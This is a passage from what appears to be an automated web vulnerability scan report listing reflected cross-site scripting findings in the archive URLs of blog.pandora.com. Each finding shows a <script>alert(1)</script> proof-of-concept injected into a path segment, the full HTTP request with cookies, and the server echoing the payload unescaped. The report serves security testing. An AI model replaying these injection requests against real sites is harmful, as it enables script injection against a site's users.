Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20069eab0<script>alert(1)</script>503e2b138de/10/ was not found on this server.</p>
...[SNIP]...

3.80. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/10/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f7d2c<script>alert(1)</script>8f8c0843fd5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/10f7d2c<script>alert(1)</script>8f8c0843fd5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/10f7d2c<script>alert(1)</script>8f8c0843fd5/ was not found on this server.</p>
...[SNIP]...

3.81. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fc20<script>alert(1)</script>d72027cb382 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8fc20<script>alert(1)</script>d72027cb382/archives/2006/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8fc20<script>alert(1)</script>d72027cb382/archives/2006/11/ was not found on this server.</p>
...[SNIP]...

3.82. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e051<script>alert(1)</script>cfbbd073882 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4e051<script>alert(1)</script>cfbbd073882/2006/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4e051<script>alert(1)</script>cfbbd073882/2006/11/ was not found on this server.</p>
...[SNIP]...

3.83. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b74cd<script>alert(1)</script>9b829fedb43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006b74cd<script>alert(1)</script>9b829fedb43/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006b74cd<script>alert(1)</script>9b829fedb43/11/ was not found on this server.</p>
...[SNIP]...

3.84. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4491<script>alert(1)</script>0e7243d947a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/11e4491<script>alert(1)</script>0e7243d947a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/11e4491<script>alert(1)</script>0e7243d947a/ was not found on this server.</p>
...[SNIP]...

3.85. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4f27b<script>alert(1)</script>ff6cdc57baa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora4f27b<script>alert(1)</script>ff6cdc57baa/archives/2006/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4f27b<script>alert(1)</script>ff6cdc57baa/archives/2006/12/ was not found on this server.</p>
...[SNIP]...

3.86. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b166<script>alert(1)</script>c595edeaf7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives7b166<script>alert(1)</script>c595edeaf7d/2006/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives7b166<script>alert(1)</script>c595edeaf7d/2006/12/ was not found on this server.</p>
...[SNIP]...

3.87. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4d7d6<script>alert(1)</script>9c1bb7f29d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20064d7d6<script>alert(1)</script>9c1bb7f29d6/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20064d7d6<script>alert(1)</script>9c1bb7f29d6/12/ was not found on this server.</p>
...[SNIP]...

3.88. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89734<script>alert(1)</script>10ad202e6f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/1289734<script>alert(1)</script>10ad202e6f5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/1289734<script>alert(1)</script>10ad202e6f5/ was not found on this server.</p>
...[SNIP]...

3.89. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/01/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 226ab<script>alert(1)</script>db94c5f4ab5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora226ab<script>alert(1)</script>db94c5f4ab5/archives/2007/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora226ab<script>alert(1)</script>db94c5f4ab5/archives/2007/01/ was not found on this server.</p>
...[SNIP]...

3.90. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/01/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f7b27<script>alert(1)</script>e88437a6ff5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesf7b27<script>alert(1)</script>e88437a6ff5/2007/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesf7b27<script>alert(1)</script>e88437a6ff5/2007/01/ was not found on this server.</p>
...[SNIP]...

3.91. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/01/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fcf4c<script>alert(1)</script>158d11b266d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007fcf4c<script>alert(1)</script>158d11b266d/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007fcf4c<script>alert(1)</script>158d11b266d/01/ was not found on this server.</p>
...[SNIP]...

3.92. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/01/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a0649<script>alert(1)</script>9f0447f5c89 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/01a0649<script>alert(1)</script>9f0447f5c89/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/01a0649<script>alert(1)</script>9f0447f5c89/ was not found on this server.</p>
...[SNIP]...

3.93. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/02/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 39608<script>alert(1)</script>520f9e495aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora39608<script>alert(1)</script>520f9e495aa/archives/2007/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora39608<script>alert(1)</script>520f9e495aa/archives/2007/02/ was not found on this server.</p>
...[SNIP]...

3.94. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/02/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 94c6d<script>alert(1)</script>71c09bfa91f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives94c6d<script>alert(1)</script>71c09bfa91f/2007/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives94c6d<script>alert(1)</script>71c09bfa91f/2007/02/ was not found on this server.</p>
...[SNIP]...

3.95. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/02/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 133b4<script>alert(1)</script>487daa5efe0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007133b4<script>alert(1)</script>487daa5efe0/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007133b4<script>alert(1)</script>487daa5efe0/02/ was not found on this server.</p>
...[SNIP]...

3.96. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/02/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b33a6<script>alert(1)</script>2c3a3b69a5c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/02b33a6<script>alert(1)</script>2c3a3b69a5c/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
